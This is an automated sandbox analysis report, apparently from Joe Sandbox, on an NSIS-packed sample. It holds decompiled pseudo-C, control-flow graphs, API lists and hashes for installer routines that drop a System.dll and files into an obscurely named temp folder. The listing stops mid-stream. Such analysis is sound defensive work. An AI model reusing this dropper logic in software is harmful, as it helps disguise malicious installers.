                                                                                      • Associated: 00000000.00000002.1325253333.000000000046C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1325304342.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_quote.jbxd
                                                                                      Similarity
                                                                                      • API ID: CountTick$wsprintf
                                                                                      • String ID: *B$ ZB$ A$ A$... %d%%
                                                                                      • API String ID: 551687249-3856725213
                                                                                      • Opcode ID: 6aa008098f4ef09d38d5c59ecde741492560208fda71d4d747c9693988f45b69
                                                                                      • Instruction ID: 934ec796fb5923f126773143cacc3683187fa16e161fba292e3b1b9e9ada072f
                                                                                      • Opcode Fuzzy Hash: 6aa008098f4ef09d38d5c59ecde741492560208fda71d4d747c9693988f45b69
                                                                                      • Instruction Fuzzy Hash: 44518C71D00219DBCB11DF65EA84B9E7FA8AF01756F10817BEC10BB2C1C7789A40CBA9
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 625 40176f-401794 call 402d3e call 405d5d 630 401796-40179c call 406411 625->630 631 40179e-4017b0 call 406411 call 405ce6 lstrcatW 625->631 636 4017b5-4017b6 call 4066c0 630->636 631->636 640 4017bb-4017bf 636->640 641 4017c1-4017cb call 40676f 640->641 642 4017f2-4017f5 640->642 649 4017dd-4017ef 641->649 650 4017cd-4017db CompareFileTime 641->650 644 4017f7-4017f8 call 405ee2 642->644 645 4017fd-401819 call 405f07 642->645 644->645 652 40181b-40181e 645->652 653 40188d-4018b6 call 405479 call 40324c 645->653 649->642 650->649 655 401820-40185e call 406411 * 2 call 40644e call 406411 call 405a77 652->655 656 40186f-401879 call 405479 652->656 667 4018b8-4018bc 653->667 668 4018be-4018ca SetFileTime 653->668 655->640 689 401864-401865 655->689 665 401882-401888 656->665 669 402bcb 665->669 667->668 671 4018d0-4018db CloseHandle 667->671 668->671 672 402bcd-402bd1 669->672 674 4018e1-4018e4 671->674 675 402bc2-402bc5 671->675 677 4018e6-4018f7 call 40644e lstrcatW 674->677 678 4018f9-4018fc call 40644e 674->678 675->669 684 401901-402390 677->684 678->684 687 402395-40239a 684->687 688 402390 call 405a77 684->688 687->672 688->687 689->665 690 401867-401868 689->690 690->656
                                                                                      C-Code - Quality: 75%
                                                                                      			E0040176F(FILETIME* __ebx, void* __eflags) {
                                                                                      				void* __esi;
                                                                                      				void* _t35;
                                                                                      				void* _t43;
                                                                                      				void* _t45;
                                                                                      				FILETIME* _t51;
                                                                                      				FILETIME* _t64;
                                                                                      				void* _t66;
                                                                                      				signed int _t72;
                                                                                      				FILETIME* _t73;
                                                                                      				FILETIME* _t77;
                                                                                      				signed int _t79;
                                                                                      				WCHAR* _t81;
                                                                                      				void* _t83;
                                                                                      				void* _t84;
                                                                                      				void* _t86;
                                                                                      
                                                                                      				_t77 = __ebx;
                                                                                      				 *(_t86 - 8) = E00402D3E(0x31);
                                                                                      				 *(_t86 + 8) =  *(_t86 - 0x30) & 0x00000007;
                                                                                      				_t35 = E00405D5D( *(_t86 - 8));
                                                                                      				_push( *(_t86 - 8));
                                                                                      				_t81 = L"Call";
                                                                                      				if(_t35 == 0) {
                                                                                      					lstrcatW(E00405CE6(E00406411(_t81, L"C:\\Users\\Arthur\\AppData\\Local\\Temp\\Susendes\\Scrumption\\Dioxide\\Spokeswoman\\Gelatinous\\Passado195")), ??);
                                                                                      				} else {
                                                                                      					E00406411();
                                                                                      				}
                                                                                      				E004066C0(_t81);
                                                                                      				while(1) {
                                                                                      					__eflags =  *(_t86 + 8) - 3;
                                                                                      					if( *(_t86 + 8) >= 3) {
                                                                                      						_t66 = E0040676F(_t81);
                                                                                      						_t79 = 0;
                                                                                      						__eflags = _t66 - _t77;
                                                                                      						if(_t66 != _t77) {
                                                                                      							_t73 = _t66 + 0x14;
                                                                                      							__eflags = _t73;
                                                                                      							_t79 = CompareFileTime(_t73, _t86 - 0x24);
                                                                                      						}
                                                                                      						asm("sbb eax, eax");
                                                                                      						_t72 =  ~(( *(_t86 + 8) + 0xfffffffd | 0x80000000) & _t79) + 1;
                                                                                      						__eflags = _t72;
                                                                                      						 *(_t86 + 8) = _t72;
                                                                                      					}
                                                                                      					__eflags =  *(_t86 + 8) - _t77;
                                                                                      					if( *(_t86 + 8) == _t77) {
                                                                                      						E00405EE2(_t81);
                                                                                      					}
                                                                                      					__eflags =  *(_t86 + 8) - 1;
                                                                                      					_t43 = E00405F07(_t81, 0x40000000, (0 |  *(_t86 + 8) != 0x00000001) + 1);
                                                                                      					__eflags = _t43 - 0xffffffff;
                                                                                      					 *(_t86 - 0x38) = _t43;
                                                                                      					if(_t43 != 0xffffffff) {
                                                                                      						break;
                                                                                      					}
                                                                                      					__eflags =  *(_t86 + 8) - _t77;
                                                                                      					if( *(_t86 + 8) != _t77) {
                                                                                      						E00405479(0xffffffe2,  *(_t86 - 8));
                                                                                      						__eflags =  *(_t86 + 8) - 2;
                                                                                      						if(__eflags == 0) {
                                                                                      							 *((intOrPtr*)(_t86 - 4)) = 1;
                                                                                      						}
                                                                                      						L31:
                                                                                      						 *0x434fa8 =  *0x434fa8 +  *((intOrPtr*)(_t86 - 4));
                                                                                      						__eflags =  *0x434fa8;
                                                                                      						goto L32;
                                                                                      					} else {
                                                                                      						E00406411("C:\Users\Arthur\AppData\Local\Temp\nsd599A.tmp", _t83);
                                                                                      						E00406411(_t83, _t81);
                                                                                      						E0040644E(_t77, _t81, _t83, "C:\Users\Arthur\AppData\Local\Temp\nsd599A.tmp\System.dll",  *((intOrPtr*)(_t86 - 0x1c)));
                                                                                      						E00406411(_t83, "C:\Users\Arthur\AppData\Local\Temp\nsd599A.tmp");
                                                                                      						_t64 = E00405A77("C:\Users\Arthur\AppData\Local\Temp\nsd599A.tmp\System.dll",  *(_t86 - 0x30) >> 3) - 4;
                                                                                      						__eflags = _t64;
                                                                                      						if(_t64 == 0) {
                                                                                      							continue;
                                                                                      						} else {
                                                                                      							__eflags = _t64 == 1;
                                                                                      							if(_t64 == 1) {
                                                                                      								 *0x434fa8 =  &( *0x434fa8->dwLowDateTime);
                                                                                      								L32:
                                                                                      								_t51 = 0;
                                                                                      								__eflags = 0;
                                                                                      							} else {
                                                                                      								_push(_t81);
                                                                                      								_push(0xfffffffa);
                                                                                      								E00405479();
                                                                                      								L29:
                                                                                      								_t51 = 0x7fffffff;
                                                                                      							}
                                                                                      						}
                                                                                      					}
                                                                                      					L33:
                                                                                      					return _t51;
                                                                                      				}
                                                                                      				E00405479(0xffffffea,  *(_t86 - 8)); // executed
                                                                                      				 *0x434fd4 =  *0x434fd4 + 1;
                                                                                      				_t45 = E0040324C( *((intOrPtr*)(_t86 - 0x28)),  *(_t86 - 0x38), _t77, _t77); // executed
                                                                                      				 *0x434fd4 =  *0x434fd4 - 1;
                                                                                      				__eflags =  *(_t86 - 0x24) - 0xffffffff;
                                                                                      				_t84 = _t45;
                                                                                      				if( *(_t86 - 0x24) != 0xffffffff) {
                                                                                      					L22:
                                                                                      					SetFileTime( *(_t86 - 0x38), _t86 - 0x24, _t77, _t86 - 0x24); // executed
                                                                                      				} else {
                                                                                      					__eflags =  *((intOrPtr*)(_t86 - 0x20)) - 0xffffffff;
                                                                                      					if( *((intOrPtr*)(_t86 - 0x20)) != 0xffffffff) {
                                                                                      						goto L22;
                                                                                      					}
                                                                                      				}
                                                                                      				CloseHandle( *(_t86 - 0x38)); // executed
                                                                                      				__eflags = _t84 - _t77;
                                                                                      				if(_t84 >= _t77) {
                                                                                      					goto L31;
                                                                                      				} else {
                                                                                      					__eflags = _t84 - 0xfffffffe;
                                                                                      					if(_t84 != 0xfffffffe) {
                                                                                      						E0040644E(_t77, _t81, _t84, _t81, 0xffffffee);
                                                                                      					} else {
                                                                                      						E0040644E(_t77, _t81, _t84, _t81, 0xffffffe9);
                                                                                      						lstrcatW(_t81,  *(_t86 - 8));
                                                                                      					}
                                                                                      					_push(0x200010);
                                                                                      					_push(_t81);
                                                                                      					E00405A77();
                                                                                      					goto L29;
                                                                                      				}
                                                                                      				goto L33;
                                                                                      			}


















                                                                                      0x0040176f
                                                                                      0x00401776
                                                                                      0x00401782
                                                                                      0x00401785
                                                                                      0x0040178a
                                                                                      0x0040178d
                                                                                      0x00401794
                                                                                      0x004017b0
                                                                                      0x00401796
                                                                                      0x00401797
                                                                                      0x00401797
                                                                                      0x004017b6
                                                                                      0x004017bb
                                                                                      0x004017bb
                                                                                      0x004017bf
                                                                                      0x004017c2
                                                                                      0x004017c7
                                                                                      0x004017c9
                                                                                      0x004017cb
                                                                                      0x004017d0
                                                                                      0x004017d0
                                                                                      0x004017db
                                                                                      0x004017db
                                                                                      0x004017ec
                                                                                      0x004017ee
                                                                                      0x004017ee
                                                                                      0x004017ef
                                                                                      0x004017ef
                                                                                      0x004017f2
                                                                                      0x004017f5
                                                                                      0x004017f8
                                                                                      0x004017f8
                                                                                      0x004017ff
                                                                                      0x0040180e
                                                                                      0x00401813
                                                                                      0x00401816
                                                                                      0x00401819
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x0040181b
                                                                                      0x0040181e
                                                                                      0x00401874
                                                                                      0x00401879
                                                                                      0x004015b6
                                                                                      0x00402925
                                                                                      0x00402925
                                                                                      0x00402bc2
                                                                                      0x00402bc5
                                                                                      0x00402bc5
                                                                                      0x00000000
                                                                                      0x00401820
                                                                                      0x00401826
                                                                                      0x0040182d
                                                                                      0x0040183a
                                                                                      0x00401845
                                                                                      0x0040185b
                                                                                      0x0040185b
                                                                                      0x0040185e
                                                                                      0x00000000
                                                                                      0x00401864
                                                                                      0x00401864
                                                                                      0x00401865
                                                                                      0x00401882
                                                                                      0x00402bcb
                                                                                      0x00402bcb
                                                                                      0x00402bcb
                                                                                      0x00401867
                                                                                      0x00401867
                                                                                      0x00401868
                                                                                      0x00401493
                                                                                      0x00402395
                                                                                      0x00402395
                                                                                      0x00402395
                                                                                      0x00401865
                                                                                      0x0040185e
                                                                                      0x00402bcd
                                                                                      0x00402bd1
                                                                                      0x00402bd1
                                                                                      0x00401892
                                                                                      0x00401897
                                                                                      0x004018a5
                                                                                      0x004018aa
                                                                                      0x004018b0
                                                                                      0x004018b4
                                                                                      0x004018b6
                                                                                      0x004018be
                                                                                      0x004018ca
                                                                                      0x004018b8
                                                                                      0x004018b8
                                                                                      0x004018bc
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x004018bc
                                                                                      0x004018d3
                                                                                      0x004018d9
                                                                                      0x004018db
                                                                                      0x00000000
                                                                                      0x004018e1
                                                                                      0x004018e1
                                                                                      0x004018e4
                                                                                      0x004018fc
                                                                                      0x004018e6
                                                                                      0x004018e9
                                                                                      0x004018f2
                                                                                      0x004018f2
                                                                                      0x00401901
                                                                                      0x00401906
                                                                                      0x00402390
                                                                                      0x00000000
                                                                                      0x00402390
                                                                                      0x00000000

                                                                                      APIs
                                                                                      • lstrcatW.KERNEL32(00000000,00000000), ref: 004017B0
                                                                                      • CompareFileTime.KERNEL32(-00000014,?,Call,Call,00000000,00000000,Call,C:\Users\user\AppData\Local\Temp\Susendes\Scrumption\Dioxide\Spokeswoman\Gelatinous\Passado195,?,?,00000031), ref: 004017D5
                                                                                        • Part of subcall function 00406411: lstrcpynW.KERNEL32(?,?,00000400,00403596,00433F00,NSIS Error,?,00000007,00000009,0000000B), ref: 0040641E
                                                                                        • Part of subcall function 00405479: lstrlenW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsd599A.tmp\System.dll,00000000,00425A20,75A323A0,?,?,?,?,?,?,?,?,?,004033B0,00000000,?), ref: 004054B1
                                                                                        • Part of subcall function 00405479: lstrlenW.KERNEL32(004033B0,Skipped: C:\Users\user\AppData\Local\Temp\nsd599A.tmp\System.dll,00000000,00425A20,75A323A0,?,?,?,?,?,?,?,?,?,004033B0,00000000), ref: 004054C1
                                                                                        • Part of subcall function 00405479: lstrcatW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsd599A.tmp\System.dll,004033B0), ref: 004054D4
                                                                                        • Part of subcall function 00405479: SetWindowTextW.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nsd599A.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nsd599A.tmp\System.dll), ref: 004054E6
                                                                                        • Part of subcall function 00405479: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040550C
                                                                                        • Part of subcall function 00405479: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405526
                                                                                        • Part of subcall function 00405479: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405534
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1324601022.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1324552152.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1324683262.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1324736673.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1325005143.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1325059654.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1325126784.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1325184138.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1325253333.000000000046C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1325304342.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_quote.jbxd
                                                                                      Similarity
                                                                                      • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                                                                      • String ID: C:\Users\user\AppData\Local\Temp\Susendes\Scrumption\Dioxide\Spokeswoman\Gelatinous\Passado195$C:\Users\user\AppData\Local\Temp\nsd599A.tmp$C:\Users\user\AppData\Local\Temp\nsd599A.tmp\System.dll$Call
                                                                                      • API String ID: 1941528284-3167102092
                                                                                      • Opcode ID: 7e87e1a5c3e28606f7f1f906368cd53c718ee535b89dc048ffa7976d1435412e
                                                                                      • Instruction ID: 3db4763bd34d6378758f0dea6881e25fdbecc032a5989a9cd586940b12637d70
                                                                                      • Opcode Fuzzy Hash: 7e87e1a5c3e28606f7f1f906368cd53c718ee535b89dc048ffa7976d1435412e
                                                                                      • Instruction Fuzzy Hash: 13419471500118BACF10BFA5CD85DAE7A79EF45368B20423FF512B21E1DB3C89919A2D
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 691 405479-40548e 692 405494-4054a5 691->692 693 405545-405549 691->693 694 4054b0-4054bc lstrlenW 692->694 695 4054a7-4054ab call 40644e 692->695 697 4054d9-4054dd 694->697 698 4054be-4054ce lstrlenW 694->698 695->694 700 4054ec-4054f0 697->700 701 4054df-4054e6 SetWindowTextW 697->701 698->693 699 4054d0-4054d4 lstrcatW 698->699 699->697 702 4054f2-405534 SendMessageW * 3 700->702 703 405536-405538 700->703 701->700 702->703 703->693 704 40553a-40553d 703->704 704->693
                                                                                      C-Code - Quality: 100%
                                                                                      			E00405479(signed int _a4, WCHAR* _a8) {
                                                                                      				struct HWND__* _v8;
                                                                                      				signed int _v12;
                                                                                      				WCHAR* _v32;
                                                                                      				long _v44;
                                                                                      				int _v48;
                                                                                      				void* _v52;
                                                                                      				void* __ebx;
                                                                                      				void* __edi;
                                                                                      				void* __esi;
                                                                                      				WCHAR* _t27;
                                                                                      				signed int _t28;
                                                                                      				long _t29;
                                                                                      				signed int _t37;
                                                                                      				signed int _t38;
                                                                                      
                                                                                      				_t27 =  *0x433ee4; // 0x1044c
                                                                                      				_v8 = _t27;
                                                                                      				if(_t27 != 0) {
                                                                                      					_t37 =  *0x434fd4;
                                                                                      					_v12 = _t37;
                                                                                      					_t38 = _t37 & 0x00000001;
                                                                                      					if(_t38 == 0) {
                                                                                      						E0040644E(_t38, 0, 0x42c248, 0x42c248, _a4);
                                                                                      					}
                                                                                      					_t27 = lstrlenW(0x42c248);
                                                                                      					_a4 = _t27;
                                                                                      					if(_a8 == 0) {
                                                                                      						L6:
                                                                                      						if((_v12 & 0x00000004) == 0) {
                                                                                      							_t27 = SetWindowTextW( *0x433ec8, 0x42c248); // executed
                                                                                      						}
                                                                                      						if((_v12 & 0x00000002) == 0) {
                                                                                      							_v32 = 0x42c248;
                                                                                      							_v52 = 1;
                                                                                      							_t29 = SendMessageW(_v8, 0x1004, 0, 0); // executed
                                                                                      							_v44 = 0;
                                                                                      							_v48 = _t29 - _t38;
                                                                                      							SendMessageW(_v8, 0x104d - _t38, 0,  &_v52); // executed
                                                                                      							_t27 = SendMessageW(_v8, 0x1013, _v48, 0); // executed
                                                                                      						}
                                                                                      						if(_t38 != 0) {
                                                                                      							_t28 = _a4;
                                                                                      							0x42c248[_t28] = 0;
                                                                                      							return _t28;
                                                                                      						}
                                                                                      					} else {
                                                                                      						_t27 = lstrlenW(_a8) + _a4;
                                                                                      						if(_t27 < 0x1000) {
                                                                                      							_t27 = lstrcatW(0x42c248, _a8);
                                                                                      							goto L6;
                                                                                      						}
                                                                                      					}
                                                                                      				}
                                                                                      				return _t27;
                                                                                      			}

















                                                                                      0x0040547f
                                                                                      0x00405489
                                                                                      0x0040548e
                                                                                      0x00405494
                                                                                      0x0040549f
                                                                                      0x004054a2
                                                                                      0x004054a5
                                                                                      0x004054ab
                                                                                      0x004054ab
                                                                                      0x004054b1
                                                                                      0x004054b9
                                                                                      0x004054bc
                                                                                      0x004054d9
                                                                                      0x004054dd
                                                                                      0x004054e6
                                                                                      0x004054e6
                                                                                      0x004054f0
                                                                                      0x004054f9
                                                                                      0x00405505
                                                                                      0x0040550c
                                                                                      0x00405510
                                                                                      0x00405513
                                                                                      0x00405526
                                                                                      0x00405534
                                                                                      0x00405534
                                                                                      0x00405538
                                                                                      0x0040553a
                                                                                      0x0040553d
                                                                                      0x00000000
                                                                                      0x0040553d
                                                                                      0x004054be
                                                                                      0x004054c6
                                                                                      0x004054ce
                                                                                      0x004054d4
                                                                                      0x00000000
                                                                                      0x004054d4
                                                                                      0x004054ce
                                                                                      0x004054bc
                                                                                      0x00405549

                                                                                      APIs
                                                                                      • lstrlenW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsd599A.tmp\System.dll,00000000,00425A20,75A323A0,?,?,?,?,?,?,?,?,?,004033B0,00000000,?), ref: 004054B1
                                                                                      • lstrlenW.KERNEL32(004033B0,Skipped: C:\Users\user\AppData\Local\Temp\nsd599A.tmp\System.dll,00000000,00425A20,75A323A0,?,?,?,?,?,?,?,?,?,004033B0,00000000), ref: 004054C1
                                                                                      • lstrcatW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsd599A.tmp\System.dll,004033B0), ref: 004054D4
                                                                                      • SetWindowTextW.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nsd599A.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nsd599A.tmp\System.dll), ref: 004054E6
                                                                                      • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040550C
                                                                                      • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405526
                                                                                      • SendMessageW.USER32(?,00001013,?,00000000), ref: 00405534
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1324601022.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1324552152.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1324683262.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1324736673.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1325005143.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1325059654.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1325126784.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1325184138.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1325253333.000000000046C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1325304342.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_quote.jbxd
                                                                                      Similarity
                                                                                      • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                                                                      • String ID: Skipped: C:\Users\user\AppData\Local\Temp\nsd599A.tmp\System.dll
                                                                                      • API String ID: 2531174081-264788777
                                                                                      • Opcode ID: aa92cd18e633272a9061a8b6b08b7c49714f2ce68e846d27045f56b788a6f560
                                                                                      • Instruction ID: 1ccddca99fa11d5427df38f31253403cabd393798f33362a1a37d4b4032a7ea7
                                                                                      • Opcode Fuzzy Hash: aa92cd18e633272a9061a8b6b08b7c49714f2ce68e846d27045f56b788a6f560
                                                                                      • Instruction Fuzzy Hash: 42219A71900518BBCB219F95DD85ACFBFB9EF45354F10803AF904B22A0C7798A908FA8
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 705 4026e4-4026fd call 402d1c 708 402bc2-402bc5 705->708 709 402703-40270a 705->709 710 402bcb-402bd1 708->710 711 40270c 709->711 712 40270f-402712 709->712 711->712 713 402876-40287e 712->713 714 402718-402727 call 406371 712->714 713->708 714->713 718 40272d 714->718 719 402733-402737 718->719 720 4027cc-4027cf 719->720 721 40273d-402758 ReadFile 719->721 723 4027d1-4027d4 720->723 724 4027e7-4027f7 call 405f8a 720->724 721->713 722 40275e-402763 721->722 722->713 727 402769-402777 722->727 723->724 725 4027d6-4027e1 call 405fe8 723->725 724->713 733 4027f9 724->733 725->713 725->724 730 402832-40283e call 406358 727->730 731 40277d-40278f MultiByteToWideChar 727->731 730->710 731->733 734 402791-402794 731->734 736 4027fc-4027ff 733->736 737 402796-4027a1 734->737 736->730 739 402801-402806 736->739 737->736 740 4027a3-4027c8 SetFilePointer MultiByteToWideChar 737->740 741 402843-402847 739->741 742 402808-40280d 739->742 740->737 743 4027ca 740->743 744 402864-402870 SetFilePointer 741->744 745 402849-40284d 741->745 742->741 746 40280f-402822 742->746 743->733 744->713 747 402855-402862 745->747 748 40284f-402853 745->748 746->713 749 402824-40282a 746->749 747->713 748->744 748->747 749->719 750 402830 749->750 750->713
                                                                                      C-Code - Quality: 87%
                                                                                      			E004026E4(intOrPtr __ebx, intOrPtr __edx, void* __edi) {
                                                                                      				intOrPtr _t65;
                                                                                      				intOrPtr _t66;
                                                                                      				intOrPtr _t72;
                                                                                      				void* _t76;
                                                                                      				void* _t79;
                                                                                      
                                                                                      				_t72 = __edx;
                                                                                      				 *((intOrPtr*)(_t76 - 8)) = __ebx;
                                                                                      				_t65 = 2;
                                                                                      				 *((intOrPtr*)(_t76 - 0x4c)) = _t65;
                                                                                      				_t66 = E00402D1C(_t65);
                                                                                      				_t79 = _t66 - 1;
                                                                                      				 *((intOrPtr*)(_t76 - 0x10)) = _t72;
                                                                                      				 *((intOrPtr*)(_t76 - 0x44)) = _t66;
                                                                                      				if(_t79 < 0) {
                                                                                      					L36:
                                                                                      					 *0x434fa8 =  *0x434fa8 +  *(_t76 - 4);
                                                                                      				} else {
                                                                                      					__ecx = 0x3ff;
                                                                                      					if(__eax > 0x3ff) {
                                                                                      						 *(__ebp - 0x44) = 0x3ff;
                                                                                      					}
                                                                                      					if( *__edi == __bx) {
                                                                                      						L34:
                                                                                      						__ecx =  *(__ebp - 0xc);
                                                                                      						__eax =  *(__ebp - 8);
                                                                                      						 *( *(__ebp - 0xc) +  *(__ebp - 8) * 2) = __bx;
                                                                                      						if(_t79 == 0) {
                                                                                      							 *(_t76 - 4) = 1;
                                                                                      						}
                                                                                      						goto L36;
                                                                                      					} else {
                                                                                      						 *(__ebp - 0x38) = __ebx;
                                                                                      						 *(__ebp - 0x18) = E00406371(__ecx, __edi);
                                                                                      						if( *(__ebp - 0x44) > __ebx) {
                                                                                      							do {
                                                                                      								if( *((intOrPtr*)(__ebp - 0x34)) != 0x39) {
                                                                                      									if( *((intOrPtr*)(__ebp - 0x24)) != __ebx ||  *(__ebp - 8) != __ebx || E00405FE8( *(__ebp - 0x18), __ebx) >= 0) {
                                                                                      										__eax = __ebp - 0x50;
                                                                                      										if(E00405F8A( *(__ebp - 0x18), __ebp - 0x50, 2) == 0) {
                                                                                      											goto L34;
                                                                                      										} else {
                                                                                      											goto L21;
                                                                                      										}
                                                                                      									} else {
                                                                                      										goto L34;
                                                                                      									}
                                                                                      								} else {
                                                                                      									__eax = __ebp - 0x40;
                                                                                      									_push(__ebx);
                                                                                      									_push(__ebp - 0x40);
                                                                                      									__eax = 2;
                                                                                      									__ebp - 0x40 -  *((intOrPtr*)(__ebp - 0x24)) = __ebp + 0xa;
                                                                                      									__eax = ReadFile( *(__ebp - 0x18), __ebp + 0xa, __ebp - 0x40 -  *((intOrPtr*)(__ebp - 0x24)), ??, ??); // executed
                                                                                      									if(__eax == 0) {
                                                                                      										goto L34;
                                                                                      									} else {
                                                                                      										__ecx =  *(__ebp - 0x40);
                                                                                      										if(__ecx == __ebx) {
                                                                                      											goto L34;
                                                                                      										} else {
                                                                                      											__ax =  *(__ebp + 0xa) & 0x000000ff;
                                                                                      											 *(__ebp - 0x4c) = __ecx;
                                                                                      											 *(__ebp - 0x50) = __eax;
                                                                                      											if( *((intOrPtr*)(__ebp - 0x24)) != __ebx) {
                                                                                      												L28:
                                                                                      												__ax & 0x0000ffff = E00406358( *(__ebp - 0xc), __ax & 0x0000ffff);
                                                                                      											} else {
                                                                                      												__ebp - 0x50 = __ebp + 0xa;
                                                                                      												if(MultiByteToWideChar(__ebx, 8, __ebp + 0xa, __ecx, __ebp - 0x50, 1) != 0) {
                                                                                      													L21:
                                                                                      													__eax =  *(__ebp - 0x50);
                                                                                      												} else {
                                                                                      													__edi =  *(__ebp - 0x4c);
                                                                                      													__edi =  ~( *(__ebp - 0x4c));
                                                                                      													while(1) {
                                                                                      														_t22 = __ebp - 0x40;
                                                                                      														 *_t22 =  *(__ebp - 0x40) - 1;
                                                                                      														__eax = 0xfffd;
                                                                                      														 *(__ebp - 0x50) = 0xfffd;
                                                                                      														if( *_t22 == 0) {
                                                                                      															goto L22;
                                                                                      														}
                                                                                      														 *(__ebp - 0x4c) =  *(__ebp - 0x4c) - 1;
                                                                                      														__edi = __edi + 1;
                                                                                      														__eax = SetFilePointer( *(__ebp - 0x18), __edi, __ebx, 1); // executed
                                                                                      														__ebp - 0x50 = __ebp + 0xa;
                                                                                      														if(MultiByteToWideChar(__ebx, 8, __ebp + 0xa,  *(__ebp - 0x40), __ebp - 0x50, 1) == 0) {
                                                                                      															continue;
                                                                                      														} else {
                                                                                      															goto L21;
                                                                                      														}
                                                                                      														goto L22;
                                                                                      													}
                                                                                      												}
                                                                                      												L22:
                                                                                      												if( *((intOrPtr*)(__ebp - 0x24)) != __ebx) {
                                                                                      													goto L28;
                                                                                      												} else {
                                                                                      													if( *(__ebp - 0x38) == 0xd ||  *(__ebp - 0x38) == 0xa) {
                                                                                      														if( *(__ebp - 0x38) == __ax || __ax != 0xd && __ax != 0xa) {
                                                                                      															 *(__ebp - 0x4c) =  ~( *(__ebp - 0x4c));
                                                                                      															__eax = SetFilePointer( *(__ebp - 0x18),  ~( *(__ebp - 0x4c)), __ebx, 1);
                                                                                      														} else {
                                                                                      															__ecx =  *(__ebp - 0xc);
                                                                                      															__edx =  *(__ebp - 8);
                                                                                      															 *(__ebp - 8) =  *(__ebp - 8) + 1;
                                                                                      															 *( *(__ebp - 0xc) +  *(__ebp - 8) * 2) = __ax;
                                                                                      														}
                                                                                      														goto L34;
                                                                                      													} else {
                                                                                      														__ecx =  *(__ebp - 0xc);
                                                                                      														__edx =  *(__ebp - 8);
                                                                                      														 *(__ebp - 8) =  *(__ebp - 8) + 1;
                                                                                      														 *( *(__ebp - 0xc) +  *(__ebp - 8) * 2) = __ax;
                                                                                      														 *(__ebp - 0x38) = __eax;
                                                                                      														if(__ax == __bx) {
                                                                                      															goto L34;
                                                                                      														} else {
                                                                                      															goto L26;
                                                                                      														}
                                                                                      													}
                                                                                      												}
                                                                                      											}
                                                                                      										}
                                                                                      									}
                                                                                      								}
                                                                                      								goto L37;
                                                                                      								L26:
                                                                                      								__eax =  *(__ebp - 8);
                                                                                      							} while ( *(__ebp - 8) <  *(__ebp - 0x44));
                                                                                      						}
                                                                                      						goto L34;
                                                                                      					}
                                                                                      				}
                                                                                      				L37:
                                                                                      				return 0;
                                                                                      			}








                                                                                      0x004026e4
                                                                                      0x004026e6
                                                                                      0x004026e9
                                                                                      0x004026eb
                                                                                      0x004026ee
                                                                                      0x004026f3
                                                                                      0x004026f7
                                                                                      0x004026fa
                                                                                      0x004026fd
